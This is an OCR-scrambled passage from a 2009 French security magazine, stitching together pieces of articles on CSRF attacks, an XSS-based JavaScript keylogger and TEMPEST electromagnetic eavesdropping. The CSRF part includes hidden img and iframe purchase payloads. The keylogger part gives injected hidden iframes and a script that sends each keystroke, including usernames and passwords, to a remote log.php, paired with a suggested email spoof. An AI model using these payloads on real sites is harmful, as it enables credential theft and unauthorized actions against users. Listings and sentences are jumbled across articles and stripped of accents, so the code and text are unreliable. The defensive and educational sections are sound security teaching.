ette faille prononce Sea-Surfing a un concept trs simple : forcer l'utilisateur tre le dclenchement d'une action. En d'autres termes, l'action va tre ralise par le navigateur de l'utilisateur sans s'en apercevoir. De plus, il faut signaler le fait que l'utilisateur doit avoir un privilge spcifique sur une plateforme concerne (comme par exemple un blog, site d'enchres etc.). Paralllement, une chose rajouter est que les attaques de type XSRF et XSS ne sont pas similaires. Une faille XSS est faite pour rediriger quelqu'un, rcuprer son cookie, ou avoir un Shell XSS, en d'autres termes, cette faille se fait en plusieurs tapes tandis qu'une faille de type XSRF se fait instantanment via le navigateur de la victime pour une action spcifique sur une plate-forme cible. Prenons l'exemple d'un site avec une authentification basique qui permet un utilisateur d'acheter des produits ainsi que les quantits souhaites. L'url en question serait de la forme : http://site.com/buy.php?product1=10&product2=20. Ds lors, une personne pourrait dtourner cela pour faire acheter la victime des produits non sollicits son insu sans l'alerter plus qu'autre chose. Les risques sont donc nombreux et varis vu l'expansion de la toile l'heure o nous parlons. Cela peut tre de changer un mot de passe, rcuprer des adresses mails, ou bien en envoyer mais aussi faire des transferts d'argent ou encore comme nous l'avons vu plus haut, acheter des produits.
Aprs avoir vu l'aspect global de ces vulnrabilits qui fleurissent sur le Web, nous allons maintenant nous intresser leur utilisation, comment les exploiter, pour ainsi comprendre comment scuriser ses applications Web un tel danger.
Utilisation l'encontre des utilisateurs
Nous allons donc reprendre l'exemple du site internet qui permet d'acheter certains produits. L'url qui nous permettait d'acheter certains produits tait du type : http://site.com/buy.php? product1=10&product2=20 Intressons-nous maintenant au code source de la page request.html, qui permet de stipuler les quantits de produits que nous voulons, et envoie cela au script buy.php (voir Listing 1). Comme nous avons pu le voir d'aprs l'url que nous avons donn, les quantits sont donns en GET dans l'url, ce qui veut dire que toutes les donnes transmises au script buy.php seront en clair dans l'url. Intressons-nous maintenant au script php qui rcupre les donnes : (voir Listing 2) Comme nous pouvons le voir, que nous utilisions $ _ GET ou $ _ REQUEST, le rsultat sera le mme car $ _ REQUEST regroupe les $ _ GET mais aussi les $ _ POST. Une personne mal intentionne pourrait donc faire en sorte qu'une personne inscrite sur ce site achte de nombreux produits, mais comment ? C'est ce que nous allons voir. Plusieurs mthodes se dessinent devant nous.
CSRF
Avant tout, la premire qui est la plus utilise consiste s'intresser aux attributs de la balise HTML <img>. Cette balise va donc nous permettre d'inclure une image. (En tout cas, la fonction premire de cette Dcomposition de la balise HTML <img> (nous nous intresserons qu' l'attribut src):
<img src="http://site.com/image.png">
Prenons par exemple ce cas l, si tout se passe bien, lorsque l'utilisateur va charger la page, l'image hberg sur http://site.com portant le nom de image.png va s'afficher. Le navigateur va donc envoyer une requte HTTP de type GET afin de la rcuperer (voir Figure 1). Dans un autre cas, si nous mettons
<img src="http://site.com">
Figure 1. Lorsqu'une image est bien charge via la balise <img>

</script> HTML : product1=10&product2=20";
<iframe name="csrf" SRC=
"http://site.com/buy.php? product1=10&product2=20" scrolling="no" height="0" width="0" FRAMEBORDER="no"></iframe>
(voir Figure 2). Ds lors, une autre requte HTTP de type GET va tre envoye http://site.com car le navigateur ne fait pas la diffrence entre une image ou pas. Ce qui fait que le site http://site.com recevra donc bien une requte HTTP de type GET. Maintenant, nous allons nous rintresser notre site qui permet de vendre diffrents produits. Si l'utilisateur navigue sur une page qui contient une balise <img> pointant vers l'url qui permet d'acheter diffrents produits, ce dernier l'aura excuter sur son propre compte. Un exemple d'exploit serait alors : (voir Listing 3) Dans ce cas l, sans que l'utilisateur s'en rende compte, celui-ci aura achet 10 quantits de produit1 et 20 quantits de produit2. Bien entendu, il n'existe pas seulement la balise <img> du HTML qui permet de faire cela. D'autres balises tel que <iframe> ou encore du JavaScript peuvent tre utilises afin de reproduire cette attaque. Nous allons donc montrer divers exemples d'utilisation comme par exemple avec la balise <script>:
<script src=http://site.com/buy.php? <script>
Nous mettons la hauteur et larguer du cadre 0 pour que celle-ci passe inaperu vis--vis de l'utilisateur dup. Nous allons nous intresser une pratique qui peut tre plus que dvastatrice qui est de coupler une XSRF avec une XSS. Listing 1. Script buy.php
En d'autres termes, si des applications Web sont vulnrables des injections de type XSS, vous pouvez faire en sorte d'y ajouter une CSRF. Prenons l'exemple d'un systme de blog qui permet de poster un commentaire au sujet d'un article spcifique. Si ce dernier module est faillible une injection XSS, nous pouvons alors y injecter un code malicieux permettant de faire des requtes vers un certain domaine ou rcuprer des informations sur les victimes. Nous pouvons aussi conjecturer le fait qu'ils sont peut tre inscrits sur le site permettant de faire des achats de produits et ainsi faire
<form action="buy.php" method="GET"> Symbol: <input type="text" name="product1" /><br /> <input type="submit" value="Acheter !" /> </form>
Listing 2. Script php a rcuprer les donnes

<?php $quantite1=$_GET['product1']; $quantite2=$_GET['product2']; buy($quantite1, $quantite2); ?>
Listing 3. Un exemple dexploit

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Exemple de faille XSRF</title> </head> <body> <img src="http://site.com/buy.php?product1=10&product2=20" /> </body> </html>
product1=10&product2=20></script>.
var foo = new Image();
foo.src = "http://site.com/buy.php?
3/2009 HAKIN9 27
PRATIQUE
acheter toutes ces victimes de nombreux produits pralablement choisis. Je ne vais donc pas expliquer le principe d'une faille XSS et comment l'exploiter, mais il suffirait d'inclure un script distant qui permettrait de faire afficher de nombreuses images travers l'attribut src et les faire pointer vers le script permettant d'acheter des produits. Cela pourrait tre mit en place grce la fonction document.write(); du JavaScript. Ex (script.js) :
document.write("<img src=\ 10&product2=20\" />");
concret qui permettrait de rsoudre une faille CSRF (voir Listing 5). Voyons maintenant le script PHP buy.php, savoir comment traite les donnes qu'il reoit (voir Listing 6). Dans ce cas l, nous regardons dj si le REFERER est le mme. Si cela est vrai, ds lors, nous dterminons si une variable est affecte grce la fonction PHP isset(); Si c'est le cas, nous pouvons alors commencer faire les traitements ncessaires. De plus nous partons dans le cas o l'utilisateur va Listing 4. Une condition dans script buy.php
rentrer de bonnes valeurs, il faudrait vrifier que ces dernires soient bien des nombres grce la fonction is_int(); de PHP. Dans les cas chants, de nombreux messages d'erreurs sont affichs pour expliquer la cause du problme. Paralllement, dans notre code PHP, nous avons utiliser le : $_POST, et non pas le $_REQUEST afin de spcifier que nous ne voulions que rcuprer les variables de type POST. Cela permet d'viter de nombreuses attaques de type CSRF.
"http://site.com/buy.php?product1=
Aprs avoir vu comment exploiter une faille de type XSRF, nous allons nous intresser aux mthodes qui peuvent nous permettre de palier ces risques de manire efficace. Comme nous avons pu le voir dans la partie prcdente, les failles de types CSRF peuvent tre trs dangereuses pour les usagers. Nous allons donc mettre en avant des techniques qui permettront de palier ces risques :
<?php if ($_SERVER['HTTP_REFERER'] == "http://site.com/request.php") { // traitement des donnes }else{ echo "L'action ne pourra pas tre ralise ! </br>"; } ?>
Listing 5. Rsoudre une faille CSRF

<script>alert('XSS')</script> " /> <style type='text/css'> #iframeSource {display: none;} #iframeLog {display: none;} </style> <iframe id='iframeSource' src='http://www.exemple.com/iframe.htm' width='1' height='1'> </iframe> <iframe id='iframeLog' src='' width='1' height='1'></iframe> <div style="  http://www.theforum_being_hacked.com/default.asp?id=1024&pag=1&searchString= %22+%2F%3E%3Cstyle+type%3D%27text%2Fcss%27%3E%23iframeSource+ %7Bdisplay%3A+none%3B%7D%23iframeLog+%7Bdisplay%3A+none%3B%7D%3C%2 Fstyle%3E%3Ciframe+id%3D%27iframeSource%27+src%3D%27http%3A%2F%2F www.exemple.com%2Fiframe.htm%27+width%3D%271%27+height%3D%271 %27%3E%3C%2Fiframe%3E%3Ciframe+id%3D%27iframeLog%27+src%3D%27%27 +width%3D%271%27+height%3D%271%27%3E%3C%2Fiframe%3E%3Cdiv+ style%3D%22
Il faut tout d'abord identifier clairement la chane injecter dans le champ de recherche du forum. Celle que j'ai utilise pour simuler l'attaque se trouve en Listing 4, conjointement avec l'URL envoyer la victime. Comme vous pouvez le constater il y a deux iframes ayant t injects de manire cache. Le premier pointe sur une page HTML du serveur :
<iframe id='iframeSource' iframe.htm' </iframe>
src='http://www.exemple.com/ width='1' height='1'>
Listing 5. La page utilise un IFRAME pointant sur la page vulnrable

<style type="text/css"> #iframeParent {display: none;} </style> <body> <iframe id="iframeParent" src=''></iframe> <script type="text/javascript"> var iframeParent = document.getElementById('iframeParent'); iframeParent.src = 'http://www.forum_being_hacked.com/default.asp?id=1024&pag= 1&searchString=%22+%2F%3E%3Cscript+src%3D%27http%3A%2F%2F www.exemple.com2Fparent.js%27%3E%3C%2Fscript%3E'; </script> </body>
Quant au second, il est vide, il permettra de charger la page de connexion du serveur, comme nous le verrons un peu plus tard :
<iframe id='iframeLog' src='' width='1' height='1'>
</iframe>
Pour que nos deux iframes soient invisibles, on va injecter une petite feuille de style :
<style type='text/css'>
Listing 6. Script distant pour le keylogging et l'mission asynchrone de requtes au serveur

parent.parent.document.onkeypress = function keylog(e){ var evt = (e) ? e : event; var keyPressed = ""; var iframeLog = parent.parent.document.getElementById('iframeLog'); if (window.ActiveXObject) //IE evt = parent.parent.window.event; keyPressed = String.fromCharCode(evt.charCode ? evt.charCode : evt.keyCode); iframeLog.src = 'http://www.exemple.com/log.php?keyPressed=' + keyPressed; }
#iframeSource {display: none;} #iframeLog {display: none;}
</style>
Tout le reste est ncessaire la fermeture des balises input, afin qu'il n'y ait pas d'erreurs HTML qui apparaissent sur la page Web. La premire sera ensuite directement injecte dans le champ de recherche, tandis que l'autre correspondra l'URL, et sera
62
HAKIN9 3/2009
KEYLOGGER 2.0

Sur Internet
http://www.javascriptkit.com/jsref/ eventkeyboardmouse.shtml Evnement associs au clavier et aux boutons de la souris, http://developer.mozilla.org/en/AJAX/ Getting_Started Dmarrer avec AJAX, http://www.quirksmode.org/js/ introevents.html Grer les vnements JavaScript, http://developer.apple.com/internet/ webcontent/iframe.html Scripts distants avec les IFRAME.
Figure 3. Une astuce utiliser sur les navigateurs pour tester des scripts distants de type cross-domain envoye l'e-mail de la victime. En Listing 5, le code se trouvant dans iframe.htm doit tre stock sur notre serveur. a ne fait que gnrer un IFRAME sur la page racine du forum qui est vulnrable. Veuillez noter que l'on injecte un fichier JavaScript parent.js dont le code est prsent en Listing 6 :
iframeParent.src = parent.parent.document.onkeypress = function keylog(e){ ... };
'http://www.forum_being
_hacked.com/default.asp?id =1024&pag=1&searchString= %22+%2F%3E%3Cscript +src%3D%27http%3A%2F%2F %27%3E%3C%2Fscript%3E';
On doit indiquer deux fois le terme parent du fait que le script s'excute depuis le second IFRAME. Le reste de la fonction est similaire la premire, except pour accder au serveur o lon nutilise pas l'objet XMLHttpRequest . En effet on charge la page d'identification de notre serveur directement partir de l'IFRAME inject :
var iframeLog =
www.exemple.com2Fparent.js
La page log.php pourrait tre similaire celle du formulaire de paiement (Cf. Listing 3). Il suffit maintenant d'envoyer notre victime l'URL, en utilisant une technique de spoofing lui faisant croire qu'il s'agit d'un e-mail provenant du forum. Tous les lments taps dans la page, nom d'utilisateur et mot de passe inclus, seront enregistrs par notre serveur. Durant la simulation d'attaque, j'ai not que le niveau de scurit par dfaut dans Internet Explorer 7 ne donne aucune alerte en cas de tentative d'attaque XSS, contrairement Firefox 3 qui bloque l'attaque et demande l'utilisateur d'accepter ou non. noter que beaucoup d'utilisateurs inexpriments utilisent Internet Explorer... Antonio Fanell
parent.parent.document.
Le script est une version modifie du premier keylogger. Pour intercepter la cl, on crira le gestionnaire d'vnement suivant : P U
iframeLog.src = 'http://
getElementById('iframeLog'); www.exemple.com/log.php?
keyPressed=' + keyPressed;
Ingnieur lectronique depuis 1998 il s'intresse de prs au domaine de la scurit et aux technologies de linformation. Il travaille actuellement comme chef de projet pour une SSII Bari, en Italie.
3/2009 HAKIN9
63
TECHNIQUE
UKASZ MACIEJEWSKI
mission compromettante.
Degr de difficult
Orage dans un verre d'eau ?

Actuellement, quasiment toutes les informations sont vendre et constituent une marchandise trs prcieuse. Voulez-vous permettre les autres de vous les voler impunment ? L'attaque est la meilleure dfense une attaque lectromagntique.
CET ARTICLE EXPLIQUE

comment apprivoiser l'mission lectromagntique, comment concevoir son propre projet TEMPEST, comment envoyer des informations binaires l'aide d'un moniteur.
CE QU'IL FAUT SAVOIR

connatre n'importe quel langage de programmation, connatre les notions de l'lectromagntisme et de l'lectronique. 64 HAKIN9 3/2009
u dbut, il a t pens que les perturbations mises par les appareils n'taient pas particulirement importantes pour le monde. La dcouverte des possibilits des ondes lectromagntiques a provoqu tant d'motions que la scurit des informations ainsi envoyes a t comme c'est souvent le cas oublie. Un peu comme le cas d'un enfant qui vient d'avoir un nouveau jouet. Les concepteurs se sont amuss avec l'lectromagntisme, ils ont conu des gadgets plus avancs en s'y basant et ils ont construit une tour de la technologie partir de ces connaissances. Cette tour de la technologie ne cesse d'tre dveloppe mais ses racines sont tombes dans les oubliettes. Si nous secouons les fondations de cette tour, le mythe de sa scurit sera dtruit. Dans un premier temps, TEMPEST (en anglais Transient Electromagnetic Pulse Emanation Standard standard de l'mission compromettante) constituait une mthode d'attaque lectromagntique visant extraire un texte pur partir des machines cryptographiques dont les Tiny ElectroMagnetic Pests Emitting Secret Things (petites parasites lectromagntiques qui mettent des donnes secrtes). C'est une dfinition trs parlante. Actuellement, prs de 175 socits sont pourvues d'une autorisation pour fabriquer les dispositifs. Wang Research Laboratories est l'un des plus grands fabricants.
Qu'est-ce l'orage ?
La guerre informatique a dbut. Tous les ans, le nombre de dispositifs de traitement des donnes s'agrandit. Certains dispositifs traitent le signal lectrique en acoustique (hauts-parleurs), d'autres crent les ondes lumineuses partir d'un signal lectrique (moniteurs). Tous ces dispositifs ont toutefois une caractristique en commun. Puisque leur travail repose sur le passage du courant du point A vers le point B (alimentation typique, envoi d'informations, etc.), une antenne mettrice peut tre cre partir d'un moyen de transport (un cble ou un circuit imprim). Le principe est simple : chaque charge lectrique est une source d'un champ lectromagntique. Puisque le passage de courant est prsent dans tous les dispositifs lectroniques, la conclusion est simple : ces dispositifs constituent des sources d'une mission d'un champ lectromagntique. Si ce champ contient des informations relatives aux donnes traites l'intrieur ou pire encore la manire dont elles sont traites, cette mission peut tre considre comme compromettante.
Description des menaces
Le problme de fuite d'informations a t rcemment abord une grande chelle dans les mdias. Comme d'habitude, les mdias exagrent le ct innovant de la technique dcrite. Elle tait en effet dj connue auparavant : en 1943, les employs de Bell Telephone
UNE ATTAQUE LECTROMAGNTIQUE

modifications du flux du champ lectrique, loi de Faraday les modifications du champ magntique font crer un champ lectrique tourbillonnant dont la taille dpend de la vitesse des modifications du flux du champ lectrique.
Figure 1. Onde lectromagntique ont dcouvert qu'un des machines cryptographiques mettait les donnes relatives au signal trait pendant son fonctionnement. l'poque, le niveau de connaissances ne permettait pas de se protger efficacement contre ce type de phnomnes. Nous pouvions considrer que durant 19 ans la technique de protection mrirait. Ce n'est pourtant pas le cas et en 1962, l'un des ingnieurs d'un mini-centre cryptographique amricain a fait connatre une prsence d'une surveillance (japonaise) effectue au moyen de la technique d'mission compromettante (vous trouverez davantage d'informations sur ce sujet dans le rapport de l'Agence de scurit amricaine TEMPEST: A Signal Problem). Le monde a ainsi pu connatre les avantages de l'mission compromettante mise. L'Europe ne se trouvait pas loin de l'utilisation de ce type des technologies. En 1960, la Grande Bretagne ngociait l'entre dans la Communaut conomique Europenne et craignait la dcision du premier ministre franais. Grce l'quipe cre par le contre-espionnage, un signal secondaire a t dcouvert dans la ligne de transmission sortante de l'ambassade de France. Aprs la conception d'un dispositif appropri, il tait possible d'accder au texte non crypt, ce qui rendait la cryptographie inutile. L'mission conduite est ne. Puisque ces technologies taient connues l'poque, taient-elle amliores depuis ? Quels sont les progrs depuis l'poque de Wim van Eck et sa premire prsentation publique du systme TEMPEST (Electromagnetic Radiation from Video Display Units: An Eavesdropping Risk?) du 1983 ?
lectromagntisme
Afin de comprendre et apprcier l'mission compromettante, il faut connatre la manire dont elle est cre. Comment un dispositif devient un petit potinier qui raconte tout le monde ce qu'il fait et Deux phnomnes en sont responsables : loi d'Ampre la circulation du courant et le champ lectrique variable font crer un champ magntique tourbillonnant dont l'induction est proportionnelle la vitesse des
Ces deux lois lmentaires, combines deux lois de Gauss (prsence de source du champ lectrique et absence de source du champ magntique), constituent une bible de l'lectromagntisme (quations de Maxwell). Une simple conclusion en dcoule : si un appareil est aliment, il n'apparatra pas immdiatement dans les circuits lectroniques. Sa valeur augmentera progressivement (tats passagers) jusqu' un niveau exig. Bien videmment, les lectrons se dplacent trs rapidement donc il est impossible d'observer ce phnomne tous les jours. Le courant est tout de mme variable dans le temps et comme nous le savons le flux d'lectrons variable cre un champ magntique. Ce champ, gnr partir d'un champ lectrique variable, gnre galement le champ lectrique variable dans le temps. Les changements de ces deux champs, et plus particulirement les perturbations du centre o les changements ont lieu, sont chargs de propager les ondes lectromagntiques (Figure 1). Quelle en est la conclusion ? La prsence de la source du champ lectrique nous informe que tout dispositif
Figure 2. Principe de cration d'une image

3/2009 HAKIN9 65
TECHNIQUE
couleur (noir absence de couleur). Cet lment est responsable des informations envoyes par le moniteur mais n'informe pas o le trouver, modulateur c'est en ralit une carte graphique. Les valeurs de couleur d'un point dfini sont donnes cet endroit une frquence d'un pixel, en combinant les donnes de tension (luminance) et les donnes temporaires (emplacement l'cran). Il influence la frquence avec laquelle nous attendons le signal portant l'information sur l'image affiche, antenne mettrice le moniteur fait office de cette antenne. Le signal de vision y renforc est plus puissant que son quivalent mis par les cbles qui le lient la carte graphique.
Figure 3. Modulation d'amplitude (AM)

gnre de manire lectronique un champ lectrique (par exemple, stockage dans les condensateurs). L'absence de la source du champ magntique nous informe qu'il peut exister mme dans un vide, ncessitant uniquement une source du champ lectrique. Une onde cre dans un vide peut se propager de manire infinie. Dans un environnement terrestre, en raison de l'endroit o elles se propagent (par exemple, particules de l'air), ces ondes sont soumises une multitude de phnomnes dont le plus important est l'amortissement. Plus la source est loigne, moins le signal est fort, ce qu'il peut tre observ dans des rseaux sans fil. Pour cette simple raison, nous observons au choix : soit un dispositif met un champ assez puissant pour qu'il puisse tre reu, soit les appareils de rception sont assez sensibles pour recevoir un signal intressant dans un chaos des ondes qui nous entourent. Nous savons donc comment attaquer. Quel est toutefois notre objectif ? La source la plus connue de l'mission compromettante est un moniteur dot d'un tube cathodique (en anglais CRT Cathode Ray Tube) et la suite de nos analyses reposera donc sur ce type moniteur. informations sur le rafrachissement des lignes (synchronisation horizontale) et du cadre (synchronisation verticale) pour crer une image correcte partir des donnes reues par la vision. De plus, le paquet d'lectrons qui cre une image doit tre dot d'une nergie suffisamment puissante pour extraire des photons partir du luminophore (ce qui n'est pas banal). De plus, nous ajoutons une manire de crer une image (Figure 2) et nous avons tout dont nous avons besoin pour crer une radio avec une modulation d'amplitude : condition de gnration dune onde lectromagntique - changement rapide des mouvements dlectrons. Le canon lectrons est responsable de cette tche ; il cre les pixels de limage. La couleur blanche correspond une valeur leve nergtique du pixel et la couleur noire labsence du signal du paquet dlectrons, signal porteur (modul) le cadre de l'image doit tre dessin pendant un rafrachissement vertical. Une ligne doit tre dessine pendant un rafrachissement horizontal moins le temps de retour du point de la fin de la ligne jusqu'au dbut de la ligne suivante. Un pixel doit tre dessin avec une telle vitesse que pendant le rafrachissement horizontal, tous les pixels puissent tre affichs dans une ligne. Cette dure est en effet dcisive pour les proprits de l'onde porteuse ou, autrement dit, du signal modul, signal qui module en ralit, il s'agit d'une valeur des couleurs de chaque pixel depuis le blanc (toutes les couleurs) jusqu' l'absence de la
Le modulateur d'amplitude le plus simple est prsent sur la Figure 3. Il se compose principalement d'un transistor, contrairement la carte graphique qui est un modulateur AM plus complexe (bien qu'elle ne s'en rende pas compte le plus probablement).
Ce que les Tigres aiment le plus
Nous voil pourvus des connaissances thoriques. Il est temps de les utiliser en pratique. Nous savons comment le signal du moniteur est gnr mais o le trouver ? La connaissance des standards
Moniteur AM
Gnralement parlant, le moniteur sert afficher une image. Le signal de vision amen depuis une carte graphique est amplifi et dirig par les circuits de balayage ; le paquet d'lectrons arrive l'cran du moniteur. Pourquoi ce processus est-il si exceptionnel de notre point de vue ? Mis part le signal de vision, le moniteur a besoin des
66 HAKIN9 3/2009
Figure 4. Projet Tempest for Eliza

employs par tous les moniteurs pour crer une image partir d'un signal vido pseudo-alatoire nous vient en aide. La frquence porteuse du signal du moniteur a une valeur de 40MHz pour une image dont la rsolution est de 800x600 et le rafrachissement - de 60Hz. En revanche, pour une rsolution de 1920x1440 et un rafrachissement de 75Hz, la valeur de la frquence d'un seul pixel est de 297MHz. Cette tendue de frquence s'appelle VHF (en anglais Very High Frequency) ou THF (trs haute frquence). L'coute y est autorise mais l'mission peut tre pnible. Tempest for Eliza, conu par Erik Thiele, est le programme le plus connu qui prsente l'mission compromettante. Grce ce programme et au programme xvidtune, nous pouvons forcer le moniteur de jouer une mlodie qui, une fois la radio accorde, pourra tre entendue. Pour ce faire, nous compilons les sources (le paquet SDL est ncessaire), nous chargeons les paramtres de configuration du moniteur depuis le programme xvidtune et les transmettons au programme :
./tempest_for_eliza 105000000 1024
Listing 1. Gnration d'une note dfinie

procedure generuj_sygnal_AM(dane:TUstawienia); var x,y:integer; //emplacement du pixle calcul ft, // frquence de la note (qui module) fp:Extended; // frquence du pixel A, //amplitude du signal modul m, //amplitude du signal qui module t, //base temporaire modulujcy, //signal qui module la porteuse modulowany:Extended; //porteuse begin fp:=dane.o_fp*1000000; //frquence du pixel [MHz] ft:=dane.ton; //frquence de la note gnre [Hz] fc:=dane.nosna; //frquence de la porteuse [Hz] //Configuration initiale des paramtres : A:=255/4; //amplitude du signal modul m:=1.0; //amplitude du signal qui module //Caluculs initiaux du signal modul par amplitude (AM) : SetLength(sygnal_zmodulowany,dane.rozX,dane.rozY); //configuration du tableau pour le signal i:=0; //numro de la ligne suivante pour calculer t:=0; //dbut, autrement dit, lorsque le temps est zro //{Nous crons l'image depuis le coin suprieur gauche de l'cran // jusqu'au coin infrieur gauche, donc de la mme manire que sur le moniteur} //nous crons l'image en nous basant sur le signal modul et qui module : for y:=0 to dane.rozY-1 do begin for x:=0 to dane.rozX-1 do begin modulujcy:=m*cos(PI2*ft*t); // signal modul modulowany := A*cos(PI2*fc*t); // signal qui module (de l'horloge) sygnal_zmodulowany[x,y]:=(1+modulujcy)*modulowany; t:=t+1/fp; //fp passage au pixel suivant end; i:=i+1; //n de la ligne suivante car nous en avons dj dessin une //{dure de retour du paquet d'lectrons jusqu'au dbut de la ligne ; dure //pendant laquelle //rien n'est mis donc il faut attendre //dure = numro de la ligne suivante dessiner* (fH +FHret)} t:=i*(1/dane.o_fh+((1/dane.o_fv)-(1/dane.o_fh)-dane.rozY*(1/dane.o_fh))/ dane.rozY); end; end;
768 1400 10000000 songs/forelise
Nous obtenons une image similaire celle de la Figure 4. Nous branchons n'importe quelle radio, nous l'accordons AM et nous trouvons la mlodie. Mme si la frquence porteuse du moniteur est plus importante que l'chelle de rception d'une radio, le son peut tre entendu grce aux basses harmoniques. eckBOX est un autre projet de la famille du petit espion. Il a besoin d'un radio, d'un transformateur A/C (analogiquenumrique) et d'un logiciel de traitement du signal en image utile pour travailler. Pourquoi un tel projet, n'a-t-il pas russi ? Cela est peut-tre du au gouvernement secret amricain qui a interdit les expriences de ce type ou peut-tre une association secrte qui voulait garder le savoir pour elle-mme. Ou peut-tre cela est du au fait que conformment la formule de Shannon-Kotielnikow la frquence d'chantillonnage doit tre au moins deux fois suprieure la frquence maximale du signal (ce qui quivaut la frquence d'chantillonnage gale 216MHz pour
un moniteur standard). La slectivit d'une radio se trouve en dehors de la bande du moniteur et elle est trop grande. Le signal gnr par la carte graphique est charg d'une erreur de 5 %, ce qui donne 5,4MHz pour 108MHz. La radio reoit une partie du signal mis mais cela donne peu d'informations pour russir avoir une image lisible. La slectivit est comme les enfants dans une aire de jeux. Une seule nounou est incapable de les attraper tous mais si elles sont plusieurs, elles ont plus de chance de le faire. Si en revanche nous appelons un grand monsieur, tous les enfants partiront dans tous les sens en criant le plus probablement. La mme chose concerne les ondes radio : si le circuit est trop slectif, nous recevrons une
partie du signal, si la bande est trop large, le circuit aura trop d'informations traiter et nous n'aurons rien. Dans une telle situation, la vitesse du flux de donnes depuis le transformateur A/C l'application de traitement n'est pas si importante.
Notre propre TEMPEST
Pour commencer notre propre aventure avec l'mission compromettante, il faut disposer des quipements appropris. Pour ne pas chercher l'intrieur du moniteur, nous relions l'ensemble l'aide d'une carte test prsente sur la Figure 5. Elle permettra d'accder tous les signaux importants. Grce aux goujons, il est possible de couper la ligne de signal de la carte graphique (en l'enlevant)
3/2009 HAKIN9 67
TECHNIQUE
et brancher notre propre version de signal via la prise BNC (par exemple, depuis une source de synchronisation externe). Si nous laissons les goujons et branchons un oscilloscope une prise donne, il est possible d'observer en dtails le signal envoy (donnes, paramtres de temps) pour le recrer par la suite soi-mme. Pour nos besoins, nous laissons toutes les lignes telles quelles et nous coupons uniquement les informations sur le trajet de vision du moniteur TEMPEST. la place des donnes de la carte graphique, nous enverrons les informations depuis la sortie d'une simple radio Am (par exemple, sortie couteurs). Cette approche simplifie les tests et ne ncessite pas la construction des circuits externes de contrle de frquence de synchronisation. La carte prte se trouve sur la Figure 6. Le branchement est prt, il est maintenant temps d'crire un logiciel qui cre un metteur avec la modulation d'amplitude partir du moniteur. Le Listing 1 prsente le code de procdure de gnration d'un signal. C'est une mthode assez primitive pour gnrer un signal AM mais elle explique de manire simple les principes de base. Les lignes 35, 36 et 37 sont charges de gnrer les valeurs appropries en se basant sur le pixel affich actuellement et de la dure dans laquelle il est affich. Une fois la ligne calcule (la boucle for interne), nous gnrons la ligne infrieure suivante. Entre la fin de la ligne gnre et le dbut de la ligne suivante, le canon lectrons doit disposer du temps pour retourner au dbut de la ligne. Pendant ce temps, le signal ne sera pas gnr donc nous passons cette brve dure (ligne 45). Une fois la ligne gnre et aprs le retour au dbut de la ligne suivante, nous rappelons la gnration du signal. La Figure 7 prsente l'image ainsi cre.
Figure 6. carte test
Protections
circulation du courant. Il est toutefois possible de concevoir un dispositif et son environnement de travail de manire ce que l'effet secondaire de son fonctionnement soit minime. Il existe plusieurs mthodes, simples et celles qui modifient compltement le fonctionnement des dispositifs bien connus. Contrle de la zone la mthode la plus ancienne mais toujours d'actualit. Elle consiste contrler les utilisateurs et les dispositifs qui se trouvent dans la zone de danger o l'mission compromettante pourrait tre employe. Modification des dispositifs si nous connaissons le fonctionnement d'un dispositif cout, nous sommes capables de traiter les informations reues. En modifiant le fonctionnement du dispositif, nous modifions la caractristique des donnes mises en forant l'attaquant concevoir de nouvelles mthodes de traitement. titre d'exemple : gnration de l'image du moniteur en tant que deux sousimages gnres simultanment. Une seule onde lectromagntique sera alors envoye deux pixels
Comme les mthodes d'utiliser l'mission compromettante sont connues, les moyens de protection devraient l'tre aussi. Il est impossible d'exclure la cration des champs lectromagntiques, comme il est impossible d'exclure la
Figure 5. Emplacement des lments d'une carte test

68 HAKIN9 3/2009
Figure 8. Interception d'une image gnre

amplificateur de haute frquence qui corrige la dynamique du circuit de mlangeur (avant la dmodulation du signal d'entre). Cette dmarche est toutefois lie aux frais d'un circuit appropri. Puisque le signal sera amplifi depuis une large bande, l'amplificateur lui-mme doit se caractriser par une large bande de transmission (30MHz 300MHz pour un circuit universel). Quand nous crons un circuit destin une bande moins large, son prix diminue aussi. Il faut donc prendre en compte le rapport qualit/ prix. La bande d'un amplificateur audio typique s'lve de 20Hz 25000Hz, il ne peut pas donc tre utilis ici. Amplificateur de petite frquence augmente la luminosit de l'image affiche mais le signal utile a dj t extrait du bruit, dmodul et trait ; que peut-on donc amplifier ? Si le dmodulateur est dot des paramtres levs, son signal de sortie sera trs bon et l'amplification n'est pas ncessaire cette tape.
Figure 7. Image gnre (1024x768 [75Hz], gauche note = 200Hz, droite note = 3000Hz) simultanment et l'image sera ainsi impossible recrer. Augmentation de brouillage s'il est impossible de rduire l'influence de fuite de donnes, nous augmentons l'mission de donnes qui ne portent aucune information importante. Grce cette dmarche, en bien choisissant le dispositif, l'attaquant recevra le brouillage la place des donnes utiles. L'inconvnient de cette mthode est le fait qu'elle est illgale car il est illgal d'utiliser un dispositif de brouillage. Blindage des dispositifs lorsqu'il est impossible de modifier le dispositif ni de le brouiller, il ne nous reste qu' l'enfermer dans une cage (une protection en mtal qui fonctionne comme la cage de Faraday). C'est une mthode relativement simple (par rapport la modification des dispositifs) et en plus, lgale. Bien videmment, il est impossible de mettre le moniteur dans une bote en mtal et de l'enfermer dedans. Premirement, il doit tre possible de voir les informations affiches sur le moniteur. Deuximement, n'oublions pas le cble d'alimentation et le cble amenant les donnes depuis l'ordinateur. Si la protection en mtal n'est pas compltement tanche (par exemple, liaisons en plastique), l'onde lectromagntique aura une fentre ouverte sur le monde. Il faut tre conscient que le blindage ne protgera pas le dispositif 100 % contre l'interception lectromagntique. Mme si nous couvrons l'cran avec une grille en mtal et les cbles avec des barreaux de ferrites (sur le cble qui lie le moniteur et l'ordinateur) et si nous utilisons des dispositifs trs sensibles et nous liminons les brouillages (par exemple, filtres d'adaptation de Kalman), l'mission compromettante sera toujours utile. Les jouets deviennent de plus en plus chers. Blindage des locaux cette technique ressemble la prcdente mais elle est employe une plus large chelle. Au lieu de nous proccuper de la scurit de chaque dispositif, nous assurons la protection du local o ils travaillent. L'avantage de cette solution est la facilit de protger les nouveaux dispositifs (il n'est pas ncessaire de concevoir de nouvelles protections) et l'absence de problme de chaleur. Il n'est pas ncessaire de modifier un local construit (plaques en mtal dans les murs) contrairement aux protections des dispositifs portables (par exemple, pour rparer une imprimante ou un moniteur ou ajouter de la mmoire vive).
Conclusion
